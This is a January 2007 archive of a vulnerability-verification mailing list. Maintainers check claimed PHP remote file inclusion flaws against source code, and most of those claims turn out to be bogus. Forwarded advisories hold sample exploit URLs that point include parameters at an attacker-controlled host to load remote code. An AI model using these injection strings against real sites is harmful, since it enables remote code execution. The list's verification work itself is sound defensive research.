From coley at mitre.org Wed Jan 3 20:41:34 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 3 Jan 2007 20:41:34 -0500 (EST) Subject: [VIM] Provable vendor ACK for CVE-2006-6810 (DB Hub DoS) Message-ID: <200701040141.l041fYHS016752@faron.mitre.org> http://mieszkancy.ds.pg.gda.pl/~centurion/darkbot/stat/click.php?id=22 This download file for version 0.353 has a changelog (DB-ChangeLog) entry for 0.352 that says "fixed this critical security bug http://www.critical.lt/?vuln/548" which is the original disclosure for CVE-2006-6810. - Steve From jkouns at opensecurityfoundation.org Thu Jan 4 00:30:26 2007 From: jkouns at opensecurityfoundation.org (jkouns) Date: Thu, 04 Jan 2007 00:30:26 -0500 Subject: [VIM] OSVDB 24021: 1WebCalendar viewEvent.cfm EventID Variable SQL Injection Message-ID: <459C90F2.1020105@opensecurityfoundation.org> OSVDB-ID 24021 Comment Official Statement from Benson IT Solutions (1/3/2007) WebCalendar v4 has been updated to include fixes that filter the url numeric and date variables in question and prevent non-numeric and non-date values from being passed to the SQL queries. This fixes the problems with the pages in question. http://www.bensonitsolutions.com/Calendar/v4/ --------------------- Guessing version 4.1 ? From heinbockel at mitre.org Thu Jan 4 11:25:29 2007 From: heinbockel at mitre.org (Heinbockel, Bill) Date: Thu, 4 Jan 2007 11:25:29 -0500 Subject: [VIM] CVE Dispute - PHPIrc_bot PHP file inclusion Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC01726A56@IMCSRV5.MITRE.ORG> researcher: ZooZ BUGTRAQ:20061231 PHPIrc_bot <= Remote File Include http://www.securityfocus.com/archive/1/archive/1/455613/100/0/threaded researcher-claimed vulnerable code (sic): > ;(include_once ($dir . $file relevant code from php4you.php (lines 47-57): > $dir = "bot_functions/"; > $dirh = opendir($dir); > while ($file = readdir($dirh)) { > if (substr($file, -4) == ".php") { > include_once($dir . $file); > } > } > closedir($dirh); obviously both $file and $dir are defined before use... William Heinbockel Infosec Engineer The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 heinbockel at mitre.org 781-271-2615 From coley at mitre.org Thu Jan 4 15:04:34 2007 From: coley at mitre.org (Steven M. Christey) Date: Thu, 4 Jan 2007 15:04:34 -0500 (EST) Subject: [VIM] CVE dispute of Enigma WordPress RFI Message-ID: <200701042004.l04K4Ynk027433@faron.mitre.org> Researcher: xoron Ref: http://www.securityfocus.com/archive/1/archive/1/455555/100/0/threaded The quoted code is: require_once($boarddir . '/PortalSources/Portal.ini.php'); $boarddir is not defined in Enigma2.php, but there's an include of an SSI.php file before that use of $boarddir: $SSIpath = '/home/username/public_html/SSI.php'; ... include_once($SSIpath); $SSIpath is expected to be modified by the user. However, SSI.php doesn't exist in Enigma2. Some research shows that Enigma2 uses SMF. A download of SMF 1.1.1 yields SSI.php: global $boardurl, $boarddir, $sourcedir, $webmaster_email, $cookiename; with no other uses of $boarddir. However, later on we have: require_once(dirname(__FILE__) . '/Settings.php'); and Settings.php has: $boarddir = dirname(__FILE__); # The absolute path to the forum's folder. (not just '.'!) The only apparent use of later variable overwrites ($$varname=x) is in ManageServer.php with fixed variable names, which appears to be intended for admin access only. So, it looks like $boarddir can't be overwritten by the attacker. - Steve From coley at mitre.org Thu Jan 4 15:38:08 2007 From: coley at mitre.org (Steven M. Christey) Date: Thu, 4 Jan 2007 15:38:08 -0500 (EST) Subject: [VIM] Source VERIFY of Enigma Coppermine Bridge RFI Message-ID: <200701042038.l04Kc86D029406@faron.mitre.org> Researcher: xoron Ref: http://www.milw0rm.com/exploits/3050 Interesting how almost the exact same line in 2 separate disclosures can have one dispute and one verification. Using the download identified in the original disclosure, possibly version 1.0 (inferred from Enigma Files/modules/Mod_Coppermine.php), we have: global $BRIDGE, $boarddir, $portalSources, $portal_version, $context, $settings, $user_info; ... require_once($boarddir . '/PortalSources/Portal.ini.php'); with no includes/etc. beforehand. - Steve From jericho at attrition.org Fri Jan 5 15:17:49 2007 From: jericho at attrition.org (security curmudgeon) Date: Fri, 5 Jan 2007 15:17:49 -0500 (EST) Subject: [VIM] vendor ack - 21849: EPiX Search Module query Variable XSS (fwd) Message-ID: ---------- Forwarded message ---------- From: Hani Suleiman To: moderators at osvdb.org Date: Fri, 5 Jan 2007 18:06:02 +0000 Reply-To: moderators at osvdb.org Subject: [OSVDB Mods] [Change Request] 21849: EPiX Search Module query Variable XSS Hi there, This issue is fixed in epix 3.1.3 and later, please update your database accordingly. Thank you! You can verify by trying to inject html into the search page at www.formicary.net From jericho at attrition.org Sat Jan 6 17:39:57 2007 From: jericho at attrition.org (security curmudgeon) Date: Sat, 6 Jan 2007 17:39:57 -0500 (EST) Subject: [VIM] vendor ack: SolidState RFI Message-ID: http://www.solid-state.org/index.php?name=PNphpBB2&file=portal&article=1&sid=60d164e325a32a0a56ed5e7b481f305a SolidState v0.4.1 SolidState v0.4.1 has been released! Changes: Fixed a remote file inclusion vulnerability present in most class files. CVE-2006-5020 http://www.milw0rm.com/exploits/2413 XF:solidstate-basepath-file-include(29095) From jericho at attrition.org Mon Jan 8 02:02:48 2007 From: jericho at attrition.org (security curmudgeon) Date: Mon, 8 Jan 2007 02:02:48 -0500 (EST) Subject: [VIM] Bogus RFI Reports Getting Out of Hand Message-ID: I know we're all getting tired of them, but this one takes the cake so far. Fri Jun 16 2006 http://archives.neohapsis.com/archives/bugtraq/2006-06/0321.html (1) path/action.php, and to files in path/nucleus including (2) media.php, (3) /xmlrpc/server.php, and (4) /xmlrpc/api_metaweblog.inc.php Sat Jun 17 2006 http://archives.neohapsis.com/archives/bugtraq/2006-06/0447.html Demonstrated that the vulnerability is bogus. Mon Oct 30 2006 http://archives.neohapsis.com/archives/bugtraq/2006-10/0486.html media.php Mon Oct 30 2006 http://archives.neohapsis.com/archives/bugtraq/2006-10/0501.html Demonstrated (again) that the vulnerability is bogus. So not only is it fake, it was previously disclosed and debunked, and these people still don't get it... I swear, Bugtraq moderators should seriously consider blocking any RFI disclosure from hotmail.com. Would save us a lot of time. From bugtraq at cgisecurity.net Mon Jan 8 02:00:40 2007 From: bugtraq at cgisecurity.net (bugtraq at cgisecurity.net) Date: Mon, 8 Jan 2007 02:00:40 -0500 (EST) Subject: [VIM] Bogus RFI Reports Getting Out of Hand In-Reply-To: Message-ID: <20070108070040.11039.qmail@cgisecurity.net> > Fri Jun 16 2006 > http://archives.neohapsis.com/archives/bugtraq/2006-06/0321.html > (1) path/action.php, and to files in path/nucleus including (2) media.php, > (3) /xmlrpc/server.php, and (4) /xmlrpc/api_metaweblog.inc.php > > Sat Jun 17 2006 > http://archives.neohapsis.com/archives/bugtraq/2006-06/0447.html > Demonstrated that the vulnerability is bogus. > > Mon Oct 30 2006 > http://archives.neohapsis.com/archives/bugtraq/2006-10/0486.html > media.php > > Mon Oct 30 2006 > http://archives.neohapsis.com/archives/bugtraq/2006-10/0501.html > Demonstrated (again) that the vulnerability is bogus. > > So not only is it fake, it was previously disclosed and debunked, and > these people still don't get it... > > I swear, Bugtraq moderators should seriously consider blocking any RFI > disclosure from hotmail.com. Would save us a lot of time. > Should the moderators be performing analysis of each post in detail before allowing it to post? I'm thinking this would drag out the postings to the point of being lagged weeks behind the other lists. Have you considered making a list of bogus vuln authors and forwarding them to the list moderators? BTW I really like what you guys are doing. - zeno http://www.cgisecurity.com/ From jericho at attrition.org Mon Jan 8 02:18:26 2007 From: jericho at attrition.org (security curmudgeon) Date: Mon, 8 Jan 2007 02:18:26 -0500 (EST) Subject: [VIM] Bogus RFI Reports Getting Out of Hand In-Reply-To: <20070108070040.11039.qmail@cgisecurity.net> References: <20070108070040.11039.qmail@cgisecurity.net> Message-ID: : > I swear, Bugtraq moderators should seriously consider blocking any RFI : > disclosure from hotmail.com. Would save us a lot of time. : : Should the moderators be performing analysis of each post in detail : before allowing it to post? I'm thinking this would drag out the : postings to the point of being lagged weeks behind the other lists. Have I don't. The moderation is already a bit slow at times, especially on holidays or anytime there is a transition between moderators. Unfortunately, they really can't even take my suggestion to heart because it would likely block a handful of legitimate disclosures, and that doesn't fly. : you considered making a list of bogus vuln authors and forwarding them : to the list moderators? Yes. OSVDB is adding all of these bogus reports to our database and tracking creditee with the intent of being able to easily generate such a list for many purposes, including that. Call me a bastard, but i'd like to see the people *repeatedly* posting bogus RFI bugs get harassed more so they stop posting without validating their findings. From bugtraq at cgisecurity.net Mon Jan 8 02:16:40 2007 From: bugtraq at cgisecurity.net (bugtraq at cgisecurity.net) Date: Mon, 8 Jan 2007 02:16:40 -0500 (EST) Subject: [VIM] Bogus RFI Reports Getting Out of Hand In-Reply-To: Message-ID: <20070108071640.12912.qmail@cgisecurity.net> > : Should the moderators be performing analysis of each post in detail > : before allowing it to post? I'm thinking this would drag out the > : postings to the point of being lagged weeks behind the other lists. Have > > I don't. The moderation is already a bit slow at times, especially on > holidays or anytime there is a transition between moderators. > Unfortunately, they really can't even take my suggestion to heart because > it would likely block a handful of legitimate disclosures, and that > doesn't fly. Have they responded to emails about specific vulnerabilities by VIM by updating vulns posted on their site? > : you considered making a list of bogus vuln authors and forwarding them > : to the list moderators? > > Yes. OSVDB is adding all of these bogus reports to our database and > tracking creditee with the intent of being able to easily generate such a > list for many purposes, including that. > > Call me a bastard, but i'd like to see the people *repeatedly* posting > bogus RFI bugs get harassed more so they stop posting without validating > their findings. Maybe you should draft up a top ten bogus vuln finders article and post it to the lists :) It would be interesting to see statistics regarding if the 'disclosure' knew it was fake, or if they thought it was real. - zeno http://www.cgisecurity.com/ Application Security news, and more http://www.cgisecurity.com/index.rss [RSS Security Feed] From theall at tenablesecurity.com Mon Jan 8 11:04:50 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 08 Jan 2007 11:04:50 -0500 Subject: [VIM] ZDI-07-001: QUALCOMM Eudora WorldMail Remote Management Heap Overflow Vulnerability Message-ID: <45A26BA2.4090409@tenablesecurity.com> Does anyone know if the overflow in WorldMail that ZDI announced late last week (CVE-2006-6336 reportedly) also affects RockLiffe's MailSite product line? WorldMail is apparently just a rebranded version of MailSite SE. George -- theall at tenablesecurity.com From coley at linus.mitre.org Mon Jan 8 14:01:22 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 8 Jan 2007 14:01:22 -0500 (EST) Subject: [VIM] Bogus RFI Reports Getting Out of Hand In-Reply-To: <20070108071640.12912.qmail@cgisecurity.net> References: <20070108071640.12912.qmail@cgisecurity.net> Message-ID: On Mon, 8 Jan 2007 bugtraq at cgisecurity.net wrote: > Maybe you should draft up a top ten bogus vuln finders article and post > it to the lists :) It would be interesting to see statistics regarding > if the 'disclosure' knew it was fake, or if they thought it was real. I've been thinking this same thing, myself, perhaps (to jump on a bandwagon) as part of a Month of Vulnerability Information Errors (MOVIE) ;-) Things are definitely getting out of hand. And even if Bugtraq tries to filter out reports from frequently erroneous researchers, they would go to full-disclosure and we'd still have to deal with it. - Steve From dm at securityfocus.com Mon Jan 8 15:42:16 2007 From: dm at securityfocus.com (dm at securityfocus.com) Date: Mon, 8 Jan 2007 13:42:16 -0700 Subject: [VIM] Bogus RFI Reports Getting Out of Hand In-Reply-To: References: <20070108070040.11039.qmail@cgisecurity.net> Message-ID: <20070108204216.GJ5427@securityfocus.com> On Mon, Jan 08, 2007 at 02:18:26AM -0500, security curmudgeon wrote: > > : > I swear, Bugtraq moderators should seriously consider blocking any RFI > : > disclosure from hotmail.com. Would save us a lot of time. > : > : Should the moderators be performing analysis of each post in detail > : before allowing it to post? I'm thinking this would drag out the > : postings to the point of being lagged weeks behind the other lists. Have > > I don't. The moderation is already a bit slow at times, especially on > holidays or anytime there is a transition between moderators. > Unfortunately, they really can't even take my suggestion to heart because > it would likely block a handful of legitimate disclosures, and that > doesn't fly. Yeah, I vetted/code audited some of these reports myself for about a week once it was apparent that we were under "grep and gripe" attack, but this ended up being a DoS to the rest of the list traffic, not the mention all of my other non-Bugtraq related work. We do vet a lot of these internally before they go to the SecurityFocus database and watch VIM as well for other bogus reports. For awhile, I was holding up the suspect posts long enough to be analyzed, but with all of the legit vulns coming in for analysis and all of the legit list traffic, this was not optimal. Crowd-sourcing the list has worked a little bit and I'll approve posts that debunk these reports when I see them but there's gotta be a better way. I don't like the idea of blacklisting specific posters because a) they make get lucky, or even more unlikely, b) may eventually beat their heads against the wall enough to clue in to what a real RFI looks like. But after awhile we've begun to learn who has a track record for reporting bogus RFIs and treat those reports with an air of suspicion. A list of repeat offenders would be helpful to us all in this capacity. We can also be more pro-active about forwarding analysis of bogus reports to VIM if that at all helps. > : you considered making a list of bogus vuln authors and forwarding them > : to the list moderators? > > Yes. OSVDB is adding all of these bogus reports to our database and > tracking creditee with the intent of being able to easily generate such a > list for many purposes, including that. > > Call me a bastard, but i'd like to see the people *repeatedly* posting > bogus RFI bugs get harassed more so they stop posting without validating > their findings. -- Dave McKinney Symantec keyID: BF919DD7 key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7 From coley at mitre.org Mon Jan 8 20:02:10 2007 From: coley at mitre.org (Steven M. Christey) Date: Mon, 8 Jan 2007 20:02:10 -0500 (EST) Subject: [VIM] Source verify - Coppermine Photo Gallery <= 1.4.10 code injection Message-ID: <200701090102.l0912Agm014617@faron.mitre.org> Researcher: DarkFig Ref: BUGTRAQ:20070105 Coppermine Photo Gallery <= 1.4.10 SQL Injection Exploit http://www.securityfocus.com/archive/1/archive/1/456051/100/0/threaded I looked at the source for 1.4.10. At the bottom of the post, we have: ... that's why we use the html_entity_decode() function. I just wanted < for a remote php code execution sploit without admin rights :'(. When the admin view the security logs, it include "security.log.php"... (security.log.php) ================== [...] if (!defined('IN_COPPERMINE')) die(); ?> Due to the IN_COPPERMINE check, we can't do a direct request. The question of authentication then comes into play. viewlog.php has: function display_log($logname) ... log_read($logname); Note that display_log() is only called if the user has admin privs: if (!$USER_DATA['has_admin_access']) { ... cpg_die(CRITICAL_ERROR,$lang_errors['access_denied'], __FILE__,1); include/logger.inc.php has: define('CPG_SECURITY_LOG','security'); ... function log_read( $log = null ) { ... $log = 'logs/'.$log.'.log.php'; @include($log); So, this is where security.log.php comes from (it's not in the actual distribution). login.php shows how we inject the code: if (isset($_POST['submitted'])) { ... log_write("Failed login attempt with Username: {$_POST['username']} from IP {$_SERVER['REMOTE_ADDR']} on " . localised_date(-1,$log_date_fmt),CPG_SECURITY_LOG); So, we can only access security.log.php using viewlog.php, which can only be accessed with admin privileges. So, only admins can execute arbitrary PHP code. - Steve P.S. The initial report's code from init.inc.php shows some dynamic variable evaluation that unsets "$$key" for most user-supplied parameter names, which might allow for some interesting attacks on HTML_SUBST, but I did not investigate closer, so I can't be sure if there's really an issue or not. From coley at mitre.org Mon Jan 8 21:52:45 2007 From: coley at mitre.org (Steven M. Christey) Date: Mon, 8 Jan 2007 21:52:45 -0500 (EST) Subject: [VIM] Source verify of Aratix RFI Message-ID: <200701090252.l092qj5U015883@faron.mitre.org> Researcher: nuffsaid Ref: http://www.milw0rm.com/exploits/3079 (currently down; come back, str0ke!). alternate is http://securityreason.com/exploitalert/1698 The very top of the code is: error_reporting(E_ALL); include $current_path . 'inc/session.inc.php'; etc., as specified in the original report. - Steve From str0ke at milw0rm.com Mon Jan 8 22:43:40 2007 From: str0ke at milw0rm.com (str0ke) Date: Mon, 8 Jan 2007 21:43:40 -0600 Subject: [VIM] Source verify of Aratix RFI In-Reply-To: <200701090252.l092qj5U015883@faron.mitre.org> References: <200701090252.l092qj5U015883@faron.mitre.org> Message-ID: <814b9d50701081943v7947ffase31d7006f1901ffd@mail.gmail.com> Hardware issues :) Back up brotha. I need to start sending all of the rfi information to this list, hopefully it will help out and make someones life a little easier. /str0ke On 1/8/07, Steven M. Christey wrote: > > Researcher: nuffsaid > > Ref: http://www.milw0rm.com/exploits/3079 (currently down; come back, > str0ke!). alternate is http://securityreason.com/exploitalert/1698 > > The very top of the code is: > > error_reporting(E_ALL); > > include $current_path . 'inc/session.inc.php'; > > etc., as specified in the original report. > > > - Steve > From coley at mitre.org Tue Jan 9 19:46:45 2007 From: coley at mitre.org (Steven M. Christey) Date: Tue, 9 Jan 2007 19:46:45 -0500 (EST) Subject: [VIM] "ppc engine" is WGS-PPC Message-ID: <200701100046.l0A0kj9Q016544@faron.mitre.org> Researcher: IbnuSina Ref: BUGTRAQ ppc engine Multiple file inclusion http://www.securityfocus.com/archive/1/archive/1/456386/100/0/threaded A Google search of inurl:"ppcbannerclick.php" resulted in the discovery that the real product is WGS-PPC. This was apparently a commercial product somewhere around 2002-2004, but it has since been retired, ripped off, repackaged, and resold, as appears to be the case with many PHP products. The executables as mentioned in the disclosure lined up with a version that I downloaded from a site of questionable motivation. Due to copyright/intellectual property uncertainties, I decided to delete the product immediately instead of verifying the researcher claims. - Steve From str0ke at milw0rm.com Tue Jan 9 21:31:10 2007 From: str0ke at milw0rm.com (str0ke) Date: Tue, 9 Jan 2007 20:31:10 -0600 Subject: [VIM] Fwd: edit-x ecommerce (include_dir) Remote File include In-Reply-To: <20070109213633.10366.qmail@securityfocus.com> References: <20070109213633.10366.qmail@securityfocus.com> Message-ID: <814b9d50701091831lf02c095ge4ac96bc38d27227@mail.gmail.com> ---------- Forwarded message ---------- From: emel_gw_ini at yahoo.com Date: 9 Jan 2007 21:36:33 -0000 Subject: edit-x ecommerce (include_dir) Remote File include To: bugtraq at securityfocus.com ============================ HItamputih Crew ==================== # hitamputih Advisory # Discovered By : IbnuSina #----------------------------------------------------------- # Software: edit x # Vendor : http://www.edit-x.com # Method: file inclusion # Thanks To : akukasih,nyubi,irvian,BlueSpy,IFX,arioo and all #hitamputih crew [[inject]]]--------------------------------------------------------- on file editx/edit_address.php $_SESSION = array(); include($include_dir.'/'.'session.'.PHP); include($include_dir.'/'.'function.'.PHP); require_once("../ups/upsavs.php"); exploit : http://target.lu/[editx PATH]/editx/edit_address.php?include_dir=HTTP://injekan.lu? [[End]]----------------------------------------------------------- This is pretty much what the file looks like ob_start(); $db_edx_host = "localhost"; // Database Hostname $db_edx_user = ""; // Database Username $db_edx_pass = ""; // Database Password $db_edx_name = ""; // Database Name $high_traffic = "N"; // Persistant Connections $edx_index = "index"; // Default PHP File $php = "php"; // PHP File Extention $cda_dir = "cda"; // CDA Include Folder $include_dir = "include"; // CMA Include Folder $directory = ""; // Install Folder $smarty_dir = "smarty"; // Smarty Folder $template_dir = "template"; // Template Folder $caching = "N"; // Caching $debug_flag = "Y"; // Debug Flag $debug_file = "debug.txt"; // Debug File $edx_key = "editx_key"; // Decrypt Key include('../cda/constants.'.$php); << doesn't seem to have anything that makes this vulnerable. $_SESSION = array(); include($include_dir.'/'.'session.'.PHP); include($include_dir.'/'.'function.'.PHP); Seems to be another bogus. /str0ke From rkeith at securityfocus.com Wed Jan 10 13:42:52 2007 From: rkeith at securityfocus.com (rkeith at securityfocus.com) Date: Wed, 10 Jan 2007 11:42:52 -0700 (MST) Subject: [VIM] [bogus] [ahmed_labib_hilmy@yahoo.com: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability] (fwd) Message-ID: install_dir is has been set. This issue is not a vuln $install_dir = dirname(__FILE__); $install_skins_dir = is_dir('./var/skins_repository') ? 'var/skins_repository' : 'skins'; include $install_dir.'/core/install.php' ----- Forwarded message from ahmed_labib_hilmy at yahoo.com ----- From: ahmed_labib_hilmy at yahoo.com Subject: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability To: bugtraq at securityfocus.com Date: 9 Jan 2007 23:33:50 -0000 X-Mailer: MIME-tools 5.411 (Entity 5.404) Message-ID: <20070109233350.31705.qmail at securityfocus.com> $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$ $$ CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability $$ Script site: http://www.cs-cart.com $$ Dork: Powered by CS-Cart - Shopping Cart Software $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$ $$ Found: irvian $$ $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$ $$Greetz:ibnusina and all $$ Specjal greetz:#hitamputih $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $install_dir = dirname(__FILE__); $install_skins_dir = is_dir('./var/skins_repository') ? 'var/skins_repository' : 'skins'; include $install_dir.'/core/install.php' Expl: http://www.site.com/[CS-Cart_path]/install.php?install_dir=[evil_scripts] ----- End forwarded message ----- -- Dave McKinney Symantec keyID: BF919DD7 key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7 -- Rob Keith Symantec From jericho at attrition.org Wed Jan 10 15:35:29 2007 From: jericho at attrition.org (security curmudgeon) Date: Wed, 10 Jan 2007 15:35:29 -0500 (EST) Subject: [VIM] [bogus] [ahmed_labib_hilmy@yahoo.com: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability] (fwd) In-Reply-To: References: Message-ID: : install_dir is has been set. : : This issue is not a vuln : From: ahmed_labib_hilmy at yahoo.com : Subject: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability : To: bugtraq at securityfocus.com : Date: 9 Jan 2007 23:33:50 -0000 Did this mail go out, or was this rejected because you noted it was a bogus report? I haven't seen this come across my inbox yet. From rkeith at securityfocus.com Wed Jan 10 16:14:11 2007 From: rkeith at securityfocus.com (rkeith at securityfocus.com) Date: Wed, 10 Jan 2007 14:14:11 -0700 (MST) Subject: [VIM] [bogus] [ahmed_labib_hilmy@yahoo.com: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability] (fwd) In-Reply-To: References: Message-ID: On Wed, 10 Jan 2007, security curmudgeon wrote: > > : install_dir is has been set. > : > : This issue is not a vuln > > : From: ahmed_labib_hilmy at yahoo.com > : Subject: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability > : To: bugtraq at securityfocus.com > : Date: 9 Jan 2007 23:33:50 -0000 > > Did this mail go out, or was this rejected because you noted it was a > bogus report? I haven't seen this come across my inbox yet. > I didn't realize this hadn't gone through to bugtraq yet. It may have been delayed or rejected for other reasons. I'll endeavor to ensure the report has seen the light of day before slapping the 'bogus' sticker on it. -- Rob Keith Symantec From jericho at attrition.org Wed Jan 10 16:32:02 2007 From: jericho at attrition.org (security curmudgeon) Date: Wed, 10 Jan 2007 16:32:02 -0500 (EST) Subject: [VIM] [bogus] [ahmed_labib_hilmy@yahoo.com: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability] (fwd) In-Reply-To: References: Message-ID: : > : From: ahmed_labib_hilmy at yahoo.com : > : Subject: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability : > : To: bugtraq at securityfocus.com : > : Date: 9 Jan 2007 23:33:50 -0000 : > : > Did this mail go out, or was this rejected because you noted it was a : > bogus report? I haven't seen this come across my inbox yet. : : I didn't realize this hadn't gone through to bugtraq yet. It may have : been delayed or rejected for other reasons. I'll endeavor to ensure the : report has seen the light of day before slapping the 'bogus' sticker on : it. I know SF would have to decide the policy on this but.. If a bogus report comes in to Bugtraq, the moderators recognize it as such and reject it, i'd still like to see it posted here. As long as it was clear that the post was rejected, then it is easy to understand what happened and still better track how many fake reports are coming in. From dm at securityfocus.com Wed Jan 10 16:34:40 2007 From: dm at securityfocus.com (dm at securityfocus.com) Date: Wed, 10 Jan 2007 14:34:40 -0700 Subject: [VIM] [bogus] [ahmed_labib_hilmy@yahoo.com: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability] (fwd) In-Reply-To: References: Message-ID: <20070110213440.GL5427@securityfocus.com> On Wed, Jan 10, 2007 at 04:32:02PM -0500, security curmudgeon wrote: > > : > : From: ahmed_labib_hilmy at yahoo.com > : > : Subject: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability > : > : To: bugtraq at securityfocus.com > : > : Date: 9 Jan 2007 23:33:50 -0000 > : > > : > Did this mail go out, or was this rejected because you noted it was a > : > bogus report? I haven't seen this come across my inbox yet. > : > : I didn't realize this hadn't gone through to bugtraq yet. It may have > : been delayed or rejected for other reasons. I'll endeavor to ensure the > : report has seen the light of day before slapping the 'bogus' sticker on > : it. > > I know SF would have to decide the policy on this but.. > > If a bogus report comes in to Bugtraq, the moderators recognize it as > such and reject it, i'd still like to see it posted here. As long as it > was clear that the post was rejected, then it is easy to understand what > happened and still better track how many fake reports are coming in. This is a reasonable request. I approved this one before I was aware it was bogus, but will be rejecting any that are known to be false. We can still post them to VIM for tracking. -- Dave McKinney Symantec keyID: BF919DD7 key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7 From coley at linus.mitre.org Wed Jan 10 17:57:29 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 10 Jan 2007 17:57:29 -0500 (EST) Subject: [VIM] [bogus] [ahmed_labib_hilmy@yahoo.com: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability] (fwd) In-Reply-To: <20070110213440.GL5427@securityfocus.com> References: <20070110213440.GL5427@securityfocus.com> Message-ID: On Wed, 10 Jan 2007 dm at securityfocus.com wrote: > This is a reasonable request. I approved this one before I was aware > it was bogus, but will be rejecting any that are known to be false. We > can still post them to VIM for tracking. This would be great, because the same disclosure is likely to come through other channels besides Bugtraq. Thanks, Steve From coley at mitre.org Wed Jan 10 19:12:53 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 10 Jan 2007 19:12:53 -0500 (EST) Subject: [VIM] Interesting advisory comments and timeline Message-ID: <200701110012.l0B0CrLm002681@faron.mitre.org> http://www.mnin.org/advisories/2007_firepass.pdf "For reasons withheld, this advisory will not contain details on vulnerable versions of FirePass. However, this information should certainly be available from the vendor's website. We would suggest creating a portal account and viewing the F5 CERT advisories and vulnerabilities page." Jul 2006 Discovered and reported a majority of vulnerabilities Long story, don.t ask. ... Nov 2006 F5 vulnerability response policy updated/modified Like the vendor bug reports, you have to register to even view the disclosure policy. - Steve From coley at mitre.org Wed Jan 10 19:53:37 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 10 Jan 2007 19:53:37 -0500 (EST) Subject: [VIM] Dispute of GeoBB RFI Message-ID: <200701110053.l0B0rbvA003110@faron.mitre.org> Researcher: ShaFuq31 Ref: GeoBB Georgian Bulletin Board Remote File Include Vuln. http://www.securityfocus.com/archive/1/archive/1/456251/100/0/threaded Claim: require($action.'.php'); In the Public First Release recent version - and the only one available since December 2006, apparently: http://sourceforge.net/project/showfiles.php?group_id=184089 we have some whitelisting of the intended action, which enters the program as $a: if (!isset($a) || !in_array($a, array ('login','logout','register','vforum','vtopic','forgotpass','usercp', 'editpost','delpost','toggletopic','movetopic','deltopic','edittopic', 'forumjump','member','search', 'viewip'))) $action = 'board'; else $action = $a; So, any use of $action on the URL is set to a whitelisted value at this point. - Steve From str0ke at milw0rm.com Wed Jan 10 20:22:19 2007 From: str0ke at milw0rm.com (str0ke) Date: Wed, 10 Jan 2007 19:22:19 -0600 Subject: [VIM] Dispute of GeoBB RFI In-Reply-To: <200701110053.l0B0rbvA003110@faron.mitre.org> References: <200701110053.l0B0rbvA003110@faron.mitre.org> Message-ID: <814b9d50701101722t6665bb6an5fe746dae5cebd91@mail.gmail.com> Yep isn't vulnerable. /str0ke On 1/10/07, Steven M. Christey wrote: > > Researcher: ShaFuq31 > > Ref: GeoBB Georgian Bulletin Board Remote File Include Vuln. > http://www.securityfocus.com/archive/1/archive/1/456251/100/0/threaded > > Claim: > > require($action.'.php'); > > In the Public First Release recent version - and the only one > available since December 2006, apparently: > > http://sourceforge.net/project/showfiles.php?group_id=184089 > > we have some whitelisting of the intended action, which enters the > program as $a: > > if (!isset($a) || > !in_array($a, array ('login','logout','register','vforum','vtopic','forgotpass','usercp', > 'editpost','delpost','toggletopic','movetopic','deltopic','edittopic', > 'forumjump','member','search', 'viewip'))) > $action = 'board'; > else > $action = $a; > > > So, any use of $action on the URL is set to a whitelisted value at > this point. > > > - Steve > From str0ke at milw0rm.com Wed Jan 10 20:25:44 2007 From: str0ke at milw0rm.com (str0ke) Date: Wed, 10 Jan 2007 19:25:44 -0600 Subject: [VIM] Vulnerable: sazcart v1.5 (cart.php) Remote File include Message-ID: <814b9d50701101725y5958811anbc59e3a5994c6a06@mail.gmail.com> /* Title: SazCart Version: 1.5.0 Author: Tony Rouse Status: Public release Copyright (c) 2005 - 2006 Tony Rouse This program is only free to TRY Copyright information at bottom of script and "Powered by SazCart" in the toolbar MUST be left READABLE on website until a license is pruchased. All restrictions can be veiwed at: http://www.sazcart.com/sazcart-lic.php This file and program are provided AS IS with NO WARRANTY OF ANY KIND. *USE AT OWN RISK* This and all other files in the download package can only be redistributed with written permission from Tony Rouse. */ include($_saz['settings']['shippingfolder'] . "/shipping.php"); $Shipping = new Shipping; ---------- Forwarded message ---------- From: emel_gw_ini at yahoo.com Date: 9 Jan 2007 22:20:54 -0000 Subject: sazcart v1.5 (cart.php) Remote File include To: bugtraq at securityfocus.com *********************---Hitamputih crew---******************************** * Bug Found By : IbnuSina * vendor : http://sazcart.com/site *Risk : High * Greetz : *Solpot,permenhack,barbarosa,cah|gemblunkz,fung_men,setiawan,irvian,meteoroid * and all member hitamputih crew community *************************************************************************** bug found on admin/controls/cart.php include($_saz['settings']['shippingfolder'] . "/shipping.php"); $Shipping = new Shipping; include($_saz['settings']['taxfolder'] . "/tax.php"); $Tax = new Tax; exploit : http://sitename.com/[sazcart 